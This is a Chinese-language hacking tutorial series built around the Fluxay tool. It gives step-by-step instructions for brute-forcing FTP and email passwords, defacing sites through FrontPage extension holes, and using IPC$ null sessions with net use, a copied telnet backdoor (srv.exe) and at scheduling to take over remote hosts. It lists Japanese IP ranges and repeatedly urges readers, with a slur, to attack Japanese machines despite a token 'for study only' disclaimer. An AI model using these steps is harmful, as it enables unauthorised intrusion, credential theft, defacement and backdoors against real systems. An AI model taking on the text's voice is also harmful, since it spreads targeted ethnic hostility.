首先还是那些废话,此文章仅仅为学习之用,如果你要进行入侵,我建议你去从头学习如何成为一名程序员,一个程序员最基本的道德就是尊重他的同行,暴力入侵一台主机是不道德的行为!看到这我不得不写一句,C语言不会say hello的朋友们可以请出了,对于程序一点不了解而仅仅想入侵别人电脑的想法很幼稚1 首先你要去下载一个流光52 关闭你本机的杀毒软件然后我们开始,打开流光以后可以看见这个画面很简介的一个程序,虽然学的都是B/S,不过我还是比较喜欢C/S的程序,不会像浏览器那样限制程序员的想像力(- - cpp学的不好...就只会用点java...连写个windows系统服务都得用msdk...)然后我们添加一个主机,这里我破解的是自己的FTP帐号的密码,所以在FTP里添加,再声明一次,不要去入侵你不该入侵的主机!然后添加用户名(用户名怎么来的先不说了,反正这里我们只"破解我自己")然后我们需要生成一个暴力破解用的密码辞典这里你需要先在自己的磁盘上新建一个拓展名为dic的字典文件,这里我使用的是lizhe.dic,然后在文件存放位置中指定它这里我生成的密码就两个(正常情况下生成2万个密码没问题),为777777和888888,哪个是真的一会就知道了然后把字典和主机用户名什么的刚刚设置完的东西的钩钩全部选上然后按"标准模式探测"按钮或者直接用ctrl+f5结果如下,可以看到我的密码是888888教程一前言:教程共分为如何利用FRONTPAGE EXTENDED PRIVILEGE HOLE入侵,如何用流光破解信箱,IPC$入侵全过程,SQL入侵全过程,以及通过一些漏洞入侵系统几大部分!我将循序渐进的教大家如何入侵主机,但是请不要入侵国内主机。
这次带来的是第一部分,以后讲陆续给大家补充,希望大家有所收获!声明一点,这是给和我一样的菜鸟看的文章,高手就不用看了!下面就开始吧!1.当然是运行我们的流光拉!我用的是流光4.5,界面如下:界面不错吧!推荐在2000下使用。
2.下面开始扫描了CTRL+R键得到下图:在开始地址填上你要扫描的IP地址,如果你在最后的IP上打上1的话,那流光就会自动扫描这个IP段的255台主机,扫描主机类型依你扫描的目的不同选择也就不同,我们这里要用的是NT/98,其他的就不用管他的了,点确定就开始了!没有打过补丁的溜光不能扫国内的主机,以免一些人拿流光来干坏事!我不推荐打补丁!因为会得到很多错误的结果!下面我们就可以等待一会了!看了很多人的教程,等待的时候都说抽根烟等一会,可惜我不会抽烟,只有和大家闲聊几句,(别说我是唐僧哦*_*)呵呵!这不结果出来了。
看吧!是不是很多结果:主机前面的颜色,代表以下几个意思:红色:该主机安装了FrontPage扩展。
并没有权限设置。
蓝色:表示该主机上安装了FrontPage扩展黑色:远程执行命令。
你可以单击该主机---连接,就可以用DOS命令操作远程计算机,如:dir c:\ 黄色:直接下载对方SAM文件(SAM文件是NT下储存用户和密码的文件,下载后来后用LC3可以解开)绿色:将对方SAM文件上传到指定的FTP服务器这是教程的第一章,将介绍扫描到的红色主机,其他的将在下次中写到!3.打开我们的FrontPage,然后文件-----打开站点-----如图:等待几秒,因为现在正在于服务器连接,读取对方的文件。
如果好了的话的到下图:这个时候你就可以直接修改他的主页了!这种方法很适合刚学黑的朋友们学习!因为比较简单,所以我把他设置在第一步!希望大家都已经学会了!快去扫小日本的主机去啊!自己再练习一下。
教程二看过第一篇文章的朋友,不知道你是否成功了,下面我们就直接进入流光教程的第二步了!我们这次使用的是流光破解信箱密码,但我个人认为在破解信箱方面还是溯雪比较强,只是个人意见!流光适用于暴力破解信箱密码!我们这次的目标还是21CN,呵呵!因为这是网上最常见的信箱。
下面就正式开始。
1.运行流光4.5,这是目前网上的最新版本3116,其次还有流光2915,2914!下面就开始破解了,选择POP3主机------右键------编辑------ 添加,得到如下图片:这里要破解的是21CN信箱所以填上:,其他的就用默认吧!不用更改,确定就行了!来到下一步,还是右键------------从列表中添加------选择一个字典,因为这是破解信箱,用户名大多都是中文拼音,到网上下载一个这样的字典。
下面我们就可以用简单模式探测了!这样速度比较快!如果不喜欢这样破解的话,你可以使用字典,我一般喜欢用流光目录下的CHIESE.DOC这个字典!字典添加方法如下图所示:图中我是随便选择的一个字典,给大家做个示范而已!这里就已经添加好字典了!下面就用标准模式来破解吧!好了!这篇文章的大体内容已经写出来了!大家多实践就明白了!最后给大家附上我找到的几个信箱的POP3地址:SINA: 网易: KM169:其实一般都在网站上会注明的。
不知道大家朋友们明白了没有!教程三这次我们要介绍的IPC$,这个功能98下是没有的!所以请使用98系统的朋友可以跳过这篇文章,或者赶快升级到WIN2000吧!都什么年代了,还在用98?而且2000的很多NET命令也不一样!IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。
在远程管理计算机和查看计算机的共享资源时使用。
利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。
用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。
相信很多朋友都在扫描中遇到建立空连接成功,说的也就是这个了!下面我们就全面开始:运行流光!首先我们的确定一下我们的目标!因为我是斑竹,不能带大家去黑国内主机,而且我也不干这个,这次的目标就是小日本吧!台湾怎么说也是我们国家的一部分!哈哈!IP地址:202.000.065.000 202.000.066.255 日本IP地址:202.000.072.000 202.000.073.255 日本IP地址:202.000.076.000 202.000.076.255 日本IP地址:202.000.093.000 202.000.093.255 日本IP地址:202.020.090.000 202.020.090.255 日本IP地址:202.006.098.000 202.006.098.255 日本IP地址:202.006.103.000 202.006.103.255 日本IP地址:202.011.000.000 202.011.255.255 日本IP地址:202.012.008.000 202.012.015.255 日本IP地址:202.013.000.000 202.013.127.255 日本IP地址:202.013.248.000 202.013.251.255 日本IP地址:202.013.252.000 202.013.253.255 日本IP地址:202.013.254.000 202.013.254.255 日本IP地址:202.013.128.000 202.013.191.255 日本IP地址:202.013.192.000 202.013.223.255 日本IP地址:202.013.224.000 202.013.239.255 日本IP地址:202.013.240.000 202.013.247.255 日本IP地址:202.015.000.000 202.015.255.255 日本IP地址:202.016.000.000 202.019.255.255 日本这些就是小日本的地址段,大家可以随便填一段扫描了看!不过我更喜欢用GOOGLE搜索!不知道大家的喜爱了!下面就开始吧!选择“探测”下的“扫描POP3/FTP/NT/SQL主机”,会出现“主机扫描设置”;在“扫描范围”中分别填写“开始地址”与“结束地址”,这里我分别填入了207.188.221.1和207.188.222.225;“扫描主机类型”选择“NT/98”.如图所示:等待一会,如果你的网速够快的话,结果很快就会出来了。
如上图所示,IPC主机下面已经得到很多结果了,下面主机前面的颜色,我在前面已经讲过了,这里再说一次。
红色:该主机安装了FrontPage扩展。
并没有权限设置。
蓝色:表示该主机上安装了FrontPage扩展。
黑色:远程执行命令。
你可以单击该主机---连接,就可以用DOS命令操作远程计算机,如:dir c:\黄色:直接下载对方SAM文件(SAM文件是NT下储存用户和密码的文件,下载后来后用LC3可以解开)。
绿色:将对方SAM文件上传到指定的FTP服务器上图中我已经得到了很多主机,日本真是笨啊!(其实国内的主机也好不到哪去)下面我们开始探测IPC主机的用户了,上图我已经很详细了吧!呵呵!不用我再多说了!来看结果吧!是不是看到很多用户名字,FALLONP,Administrstor,都是超级用户,而且还有很多其他用户,如果我们不能直接探测到ADMIN的密码,我们还可以从其他用户下手,然后提升自己的权限!下面的是引用一位朋友写的教程,因为过程都一样,所以我就不用去截图了!感谢这位朋友!这时候我们运行win2000下的cmd.exe,打入命令:net use \\IP地址\ipc$ “密码” /user: “用户名”成功连接后显示命令成功完成这时候你想干什么都可以了!哈哈!没有看见命令成功完成吗?如果你想黑他页面的话找到他的网页所在的目录,如:c:\inetpub\wwwroot ,用命令:copy c:\index.htm \\IP地址\c$\inetpub\wwwroot这里的c:\index.htm指的是你作好的网页,上传替换掉原先的文件就可以改他的主页了,如果你想进一步登陆到他的服务器,那么我们要做的是传一个telnet服务器端上去,将telnet服务打开,找到流光目录tool文件夹下的sev.exe,将它复制到你的c盘,然后用命令:copy c:\srv.exe \\IP地址\admin$ 意思是把本地C盘的srv.exe上传到服务器的system32目录下,我们在利用win2000的时间计划来启动这个服务器端,首先要知道对方服务器的所在时间,用命令:net time \\IP地址可以得到时间看到了吗??对方的时间为2001年12月31日,上午06:36,这个时候要转换位24小时制,得到系统时间后,我们再用命令:at \\IP地址启动telnet的时间 srv.exe成功的话显示填加任务完成:用srv.exe打开的默认端口是99,听段音乐吧!等到时间后,我们就可以用命令:telnet IP地址 99远程登陆到服务器上了,成功登陆后,对方服务器的c:\winnt\system32\目录就在你眼前了,下面的事情不用我再教你了吧!教程四这次我们入侵的对象是SQL主机。